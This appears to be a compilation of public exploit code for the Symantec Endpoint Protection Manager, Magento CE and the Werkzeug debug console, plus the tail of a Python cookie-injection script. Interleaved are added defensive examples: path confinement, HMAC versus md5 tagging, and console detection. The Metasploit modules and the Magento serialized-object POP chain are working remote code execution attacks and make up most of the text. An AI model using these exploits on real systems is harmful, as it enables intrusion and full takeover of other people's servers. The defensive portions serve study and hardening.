buf+="User-Agent: Mozilla/4.0\r\n"
buf+="Host:" + host + ":" + str(port) + "\r\n"
buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buf+="Accept-Language: en-us\r\n"
buf+="Accept-Encoding: gzip, deflate\r\n"
buf+="Referer: http://" + host + "/\r\n"
buf+="Cookie: SESSIONID=1337; UserID=" + payload + "; PassWD=;\r\n"
buf+="Conection: Keep-Alive\r\n\r\n"

print "[*] Connecting to Host " + host + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect=s.connect((host, port))
    print "[*] Connected to " + host + "!"
except:
    print "[!] " + host + " didn't respond\n"
    sys.exit(0)

print "[*] Sending malformed request..."
s.send(buf)
print "[!] Exploit has been sent!\n"
s.close()
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Symantec Endpoint Protection Manager Authentication Bypass and Code Execution',
      'Description'    => %q{
        This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager
        in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM. The vulnerabilities
        include an authentication bypass, a directory traversal and a privilege escalation to get
        privileged code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Markus Wulftange', # discovery
          'bperry'            # metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2015-1486'],
          ['CVE', '2015-1487'],
          ['CVE', '2015-1489'],
          ['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']
        ],
      'DefaultOptions' =>
        {
          'SSL' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic',
            {
              'Arch'    => ARCH_X86,
              'Payload' =>
                {
                  'DisableNops' => true
                }
            }
          ],
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Jul 31 2015',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(8443),
        OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
      ], self.class)
  end

  def exploit
    meterp = Rex::Text.rand_text_alpha(10)
    jsp = Rex::Text.rand_text_alpha(10)

    print_status("#{peer} - Getting cookie...")
    res = send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
      'method'    => 'POST',
      'vars_post' => {
        'ActionType' => 'ResetPassword',
        'UserID'     => 'admin',
        'Domain'     => ''
      }
    })

    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{peer} - The server did not respond in an expected way")
    end

    cookie = res.get_cookies

    if cookie.nil? || cookie.empty?
      fail_with(Failure::Unknown, "#{peer} - The server did not return a cookie")
    end

    exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%>
<%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %>
}

    print_status("#{peer} - Uploading payload...")
    res = send_request_cgi({
      'uri'      => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
      'method'   => 'POST',
      'vars_get' => {
        'ActionType'  => 'BinaryFile',
        'Action'      => 'UploadPackage',
        'PackageFile' => "../../../tomcat/webapps/ROOT/#{meterp}.exe",
        'KnownHosts'  => '.'
      },
      'data'     => payload.encoded_exe,
      'cookie'   => cookie,
      'ctype'    => ''
    })

    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
    end

    register_file_for_cleanup("../tomcat/webapps/ROOT/#{meterp}.exe")

    print_status("#{peer} - Uploading JSP page to execute the payload...")
    res = send_request_cgi({
      'uri'      => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
      'method'   => 'POST',
      'vars_get' => {
        'ActionType'  => 'BinaryFile',
        'Action'      => 'UploadPackage',
        'PackageFile' => "../../../tomcat/webapps/ROOT/#{jsp}.jsp",
        'KnownHosts'  => '.'
      },
      'data'     => exec,
      'cookie'   => cookie,
      'ctype'    => ''
    })

    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
    end

    register_file_for_cleanup("../tomcat/webapps/ROOT/#{jsp}.jsp")

    print_status("#{peer} - Executing payload. Manual cleanup will be required.")
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp")
    }, 5)
  end
end
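Two entries on this page turn on a file name that the server takes from the request and resolves without confining it: the CUCM GetFileContent servlet's FileName parameter (issue 2 of the Vantage Point advisory, an absolute path) and the SEPM UploadPackage action's PackageFile parameter in the module above (a "../../../" traversal out of the package directory into the Tomcat webroot). The following is an added example written for this page, not code from Cisco, Symantec or Metasploit: a confinement check that resolves a user-supplied name strictly inside a base directory and rejects both shapes, plus the prefix pitfall that a naive startswith check misses. The directory names are constructed for the example.

```python
"""Added example: confining a request-supplied file name to a base directory.
Covers the absolute-path and dot-dot traversal shapes seen in the CUCM and
SEPM entries. Directory names are constructed for this example."""
import posixpath


class PathRejected(ValueError):
    """Raised when a user-supplied path cannot be resolved inside the base."""


def confine(base_dir: str, user_path: str) -> str:
    """Resolve user_path strictly inside base_dir or raise PathRejected.

    Order of checks matters: characters first (NUL truncates C strings and
    backslashes are not separators to posixpath, so they must not survive),
    then absolute paths, then normalisation of '.' and '..', and finally the
    containment test against base_dir *with its trailing separator*, so that
    a sibling directory sharing the prefix (packages2 vs packages) is rejected.
    """
    if not user_path:
        raise PathRejected("empty path")
    if "\x00" in user_path or "\\" in user_path:
        raise PathRejected("illegal character in path")
    if posixpath.isabs(user_path):
        raise PathRejected("absolute paths are not allowed")
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, user_path))
    if candidate != base and not candidate.startswith(base + "/"):
        raise PathRejected("path escapes the base directory")
    return candidate


def check(base_dir: str, user_path: str) -> tuple:
    """Convenience wrapper: (accepted, resolved_path_or_reason)."""
    try:
        return True, confine(base_dir, user_path)
    except PathRejected as exc:
        return False, str(exc)


# Constructed sample inputs: the two shapes from this page, a legitimate name,
# a harmless '..' that stays inside, a Windows-style traversal, and the
# shared-prefix sibling directory that defeats a bare startswith().
SAMPLES = [
    ("/opt/sepm/packages", "../../../tomcat/webapps/ROOT/x.exe"),
    ("/var/cucm/reports", "/usr/local/thirdparty/jakarta-tomcat/conf/tomcat-users.xml"),
    ("/opt/sepm/packages", "report-2015-08.txt"),
    ("/opt/sepm/packages", "sub/../report.txt"),
    ("/opt/sepm/packages", "..\\..\\x.exe"),
    ("/opt/sepm/packages", "../packages2/x"),
]

if __name__ == "__main__":
    for base, name in SAMPLES:
        ok, detail = check(base, name)
        print("%-8s %-60s -> %s" % ("ACCEPT" if ok else "REJECT", name, detail))
```

On a real server the resolved path should additionally be opened relative to a directory handle or after an os.path.realpath() round-trip, so that symlinks inside the base cannot point back out; the string-level check above is the necessary first layer, not the only one.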

Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution

#!/usr/bin/python
# Exploit Title: Magento CE < 1.9.0.1 Post Auth RCE
# Google Dork: "Powered by Magento"
# Date: 08/18/2015
# Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com
# Vendor Homepage: http://magento.com/
# Software Link: https://www.magentocommerce.com/download
# Version: 1.9.0.1 and below
# Tested on: Ubuntu 15
# CVE : none

from hashlib import md5
import sys
import re
import base64
import mechanize


def usage():
    # script name substituted into both %s placeholders (missing in the original)
    print "Usage: python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\"" % (sys.argv[0], sys.argv[0])
    sys.exit()

if len(sys.argv) != 3:
    usage()

# Command-line args
target = sys.argv[1]
arg = sys.argv[2]

# Config.
username = ''
password = ''
php_function = 'system'  # Note: we can only pass 1 argument to the function
install_date = 'Sat, 15 Nov 2014 20:27:57 +0000'  # This needs to be the exact date from /app/etc/local.xml

# POP chain to pivot into call_user_exec
payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \
          '\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \
          'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"' \
          'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00' \
          '_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \
          ';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function, len(arg), arg)

# Setup the mechanize browser and options
br = mechanize.Browser()
#br.set_proxies({"http": "localhost:8080"})
br.set_handle_robots(False)

request = br.open(target)
br.select_form(nr=0)
br.form.new_control('text', 'login[username]', {'value': username})  # Had to manually add username control.
br.form.fixup()
br['login[username]'] = username
br['login[password]'] = password
br.method = "POST"
request = br.submit()
content = request.read()

url = re.search("ajaxBlockUrl = \'(.*)\'", content)
url = url.group(1)
key = re.search("var FORM_KEY = '(.*)'", content)
key = key.group(1)

request = br.open(url + 'block/tab_orders/period/7d/?isAjax=true', data='isAjax=false&form_key=' + key)
tunnel = re.search("src=\"(.*)\?ga=", request.read())
tunnel = tunnel.group(1)

payload = base64.b64encode(payload)
gh = md5(payload + install_date).hexdigest()
exploit = tunnel + '?ga=' + payload + '&h=' + gh

try:
    request = br.open(exploit)
except (mechanize.HTTPError, mechanize.URLError) as e:
    print e.read()
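The last lines of the script above are the interesting part from a design standpoint: the serialized blob travels in the "ga" parameter and is accepted if "h" equals md5(payload + install_date). That is a plain hash over the data concatenated with a value the application stores in its own configuration file, so anyone who learns or guesses that value mints a valid tag for any blob. The following is an added example written for this page, not part of the exploit or of Magento. It reproduces that weak construction beside a keyed HMAC and shows that a forged blob passes the first and fails the second; the serialized strings are constructed stand-ins, not the exploit's POP chain, and the install date is the value from the script's config.

```python
"""Added example: md5(data + shared_string) versus HMAC-SHA256 under a secret
key, applied to a base64 blob in the shape the Magento script sends.
Serialized strings below are constructed stand-ins."""
import base64
import hashlib
import hmac
import secrets


def weak_tag(payload_b64: str, install_date: str) -> str:
    """The construction the exploit reproduces: unkeyed hash over payload and a
    string that lives in the application's config and is not a true secret."""
    return hashlib.md5((payload_b64 + install_date).encode()).hexdigest()


def weak_verify(payload_b64: str, tag: str, install_date: str) -> bool:
    return hmac.compare_digest(weak_tag(payload_b64, install_date), tag)


def strong_tag(payload_b64: str, key: bytes) -> str:
    """HMAC-SHA256 under a key generated for this purpose and never sent to clients."""
    return hmac.new(key, payload_b64.encode(), hashlib.sha256).hexdigest()


def strong_verify(payload_b64: str, tag: str, key: bytes) -> bool:
    # constant-time comparison; mismatched lengths simply compare unequal
    return hmac.compare_digest(strong_tag(payload_b64, key), tag)


def demo() -> dict:
    install_date = "Sat, 15 Nov 2014 20:27:57 +0000"   # value from the script's config
    legit = base64.b64encode(b'O:13:"Varien_Object":0:{}').decode()   # constructed, benign blob
    forged = base64.b64encode(b'O:8:"Zend_Log":0:{}').decode()         # constructed stand-in

    # Weak scheme: whoever knows install_date produces a valid tag for any blob.
    weak_accepts_forgery = weak_verify(forged, weak_tag(forged, install_date), install_date)

    # Strong scheme: the server holds a random key; the client never sees it.
    key = secrets.token_bytes(32)
    legit_tag = strong_tag(legit, key)
    strong_accepts_legit = strong_verify(legit, legit_tag, key)
    # Without the key the best an attacker can do is reuse a tag seen for
    # another blob, or present a tag computed the weak way. Both fail.
    strong_accepts_forgery = (strong_verify(forged, legit_tag, key)
                              or strong_verify(forged, weak_tag(forged, install_date), key))

    return {
        "weak_accepts_forgery": weak_accepts_forgery,
        "strong_accepts_legit": strong_accepts_legit,
        "strong_accepts_forgery": strong_accepts_forgery,
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print("%-24s %s" % (name + ":", result))
```

The tag only moves the problem: even a correct HMAC merely ensures the blob came from the server, and the server still unserializes it. Signing untrusted input is the mitigation for tampering; not feeding attacker-influenced data to unserialize() at all is the fix for the class of bug.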

Werkzeug - Debug Shell Command Execution (Metasploit)

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Werkzeug Debug Shell Command Execution',
      'Description'    => %q{
        This module will exploit the Werkzeug debug console to put down a
        Python shell. This debugger "must never be used on production
        machines" but sometimes slips past testing.

        Tested against:
          0.9.6 on Debian
          0.9.6 on Centos
          0.10 on Debian
      },
      'Author'         => 'h00die <mike[at]shorebreaksecurity.com>',
      'References'     =>
        [
          ['URL', 'http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger']
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => ['python'],
      'Targets'        => [[ 'werkzeug 0.10 and older', {}]],
      'Arch'           => ARCH_PYTHON,
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jun 28 2015'
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'URI to the console', '/console'])
      ], self.class
    )
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(datastore['TARGETURI'])
    )
    # https://github.com/mitsuhiko/werkzeug/blob/cc8c8396ecdbc25bedc1cfdddfe8df2387b72ae3/werkzeug/debug/tbtools.py#L67
    if res && res.body =~ /Werkzeug powered traceback interpreter/
      return Exploit::CheckCode::Appears
    end
    Exploit::CheckCode::Safe
  end

  def exploit
    # first we need to get the SECRET code
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(datastore['TARGETURI'])
    )

    if res && res.body =~ /SECRET = "([a-zA-Z0-9]{20})";/
      secret = $1
      vprint_status("Secret Code: #{secret}")
      send_request_cgi(
        'method'   => 'GET',
        'uri'      => normalize_uri(datastore['TARGETURI']),
        'vars_get' => {
          '__debugger__' => 'yes',
          'cmd'          => payload.encoded,
          'frm'          => '0',
          's'            => secret
        }
      )
    else
      print_error('Secret code not detected.')
    end
  end
end
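The module's check() method is a useful template for the defender: the console page identifies itself with a fixed footer string, and the live console embeds a per-process SECRET in its HTML, which is exactly what a deployment review or an external scan should look for. The following is an added example written for this page, not part of the Metasploit module or of Werkzeug. It classifies fetched response bodies the way check() does, reports whether the console's SECRET is present, and adds the configuration-side guard that keeps the debugger from being enabled outside a development environment. The response bodies are constructed to resemble the console page; the marker text and SECRET pattern are the ones the module matches on.

```python
"""Added example: detecting an exposed Werkzeug debug console from a fetched
page body, plus a startup guard. Response bodies are constructed for this
example; the two patterns are those used by the module above."""
import re

# Footer text of the Werkzeug debugger page, as matched by the module's check().
MARKER = "Werkzeug powered traceback interpreter"

# Per-process console secret embedded in the page, as matched by the module's exploit().
SECRET_RE = re.compile(r'SECRET = "([a-zA-Z0-9]{20})";')


def classify_console_response(body: str) -> str:
    """'exposed' when the debugger page is served at the probed URI, else 'safe'."""
    return "exposed" if MARKER in body else "safe"


def console_secret_present(body: str) -> bool:
    """True when the page carries the console SECRET, i.e. the interactive
    console (not merely a static traceback page) is reachable."""
    return SECRET_RE.search(body) is not None


def audit_bodies(bodies: dict) -> dict:
    """Map each probed URL to its finding, for a fleet-wide scan report."""
    return {
        url: {
            "status": classify_console_response(body),
            "interactive_console": console_secret_present(body),
        }
        for url, body in bodies.items()
    }


def debugger_allowed(debug_flag: bool, environment: str) -> bool:
    """Deployment policy: the Werkzeug debugger is acceptable only in development."""
    return (not debug_flag) or environment == "development"


def assert_debugger_off(debug_flag: bool, environment: str) -> None:
    """Startup guard a WSGI app can call before serving; refuses misconfiguration."""
    if not debugger_allowed(debug_flag, environment):
        raise RuntimeError("Werkzeug debugger must not be enabled in %s" % environment)


# Constructed sample bodies: a 404 from a hardened host and a console page
# modelled on the debugger's output (20-character alphanumeric secret).
SAFE_BODY = "<!DOCTYPE html><html><body><h1>Not Found</h1></body></html>"
EXPOSED_BODY = (
    '<title>Console // Werkzeug Debugger</title>'
    '<script type="text/javascript">var SECRET = "%s";</script>'
    '<div class="footer">Brought to you by <strong>DON\'T PANIC</strong>, '
    'your friendly Werkzeug powered traceback interpreter.</div>'
) % ("x" * 20)

SAMPLE_BODIES = {
    "https://app-a.example.test/console": SAFE_BODY,
    "https://app-b.example.test/console": EXPOSED_BODY,
}

if __name__ == "__main__":
    for url, finding in audit_bodies(SAMPLE_BODIES).items():
        print(url, finding)
    assert_debugger_off(False, "production")
```

The scan half finds consoles already exposed; the guard half prevents them, by failing the process at start rather than relying on someone remembering to flip a flag before deploy.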